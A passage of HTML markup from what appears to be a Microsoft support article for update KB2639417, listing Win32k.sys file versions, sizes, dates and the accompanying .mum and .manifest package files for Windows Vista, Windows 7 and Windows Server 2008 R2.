class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,422</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sc~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_1_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_1~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,548</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,430</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_server~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,449</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,221</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_212602208488106d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_21b0a11b9da4c6b5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">15:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h3 class=\"sbody-h3\">Windows 7 and Windows Server 2008 R2 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SPn), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">Version</td><td class=\"sbody-td\">Product</td><td class=\"sbody-td\">Milestone</td><td class=\"sbody-td\">Service branch</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.7600.16xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.7600.20xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.7601.17xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.1.7601.21xxx</td><td class=\"sbody-td\">Windows 7 and Windows Server 2008 R2</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests7\" href=\"#manifests7\" managed-link=\"\" target=\"\">listed separately</a> in the \"Additional file information for Windows 7 and Windows Server 2008 R2\" section. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files, for which the attributes are not listed, are signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.16920</td><td class=\"sbody-td\">2,340,352</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:23</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.21097</td><td class=\"sbody-td\">2,349,568</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:26</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.17730</td><td class=\"sbody-td\">2,342,912</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.21866</td><td class=\"sbody-td\">2,350,080</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:21</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows 7 and Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.16920</td><td class=\"sbody-td\">3,141,632</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">05:00</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.21097</td><td class=\"sbody-td\">3,146,240</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.17730</td><td class=\"sbody-td\">3,145,216</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:52</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.21866</td><td class=\"sbody-td\">3,146,752</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:45</td><td class=\"sbody-td\">x64</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.16920</td><td class=\"sbody-td\">7,438,848</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">04:20</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7600.21097</td><td class=\"sbody-td\">7,443,968</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">03:58</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.17730</td><td class=\"sbody-td\">7,435,264</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">03:48</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Win32k.sys</td><td class=\"sbody-td\">6.1.7601.21866</td><td class=\"sbody-td\">7,442,944</td><td class=\"sbody-td\">24-Nov-2011</td><td class=\"sbody-td\">03:46</td><td class=\"sbody-td\">IA-64</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows 7 and Windows Server 2008 R2</h3><a class=\"bookmark\" id=\"manifests7\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,784</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,485</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,789</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,688</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,769</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,670</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,784</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_4_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,485</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,983</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_5_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,491</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb2639417_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,965</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_6_for_kb2639417~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,472</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_rtm_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,865</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_rtm~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,935</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sp1_bf~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,894</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sp1~31bf3856ad364e35~x86~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,929</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,728</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_2741763af4537d13d2c9e548ebb3c51c_31bf3856ad364e35_6.1.7601.17730_none_77cdf54610460b0e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">X86_3bdc3aa11f4024df1b03f773970380d2_31bf3856ad364e35_6.1.7600.21097_none_ec41703668627eb3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">694</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td 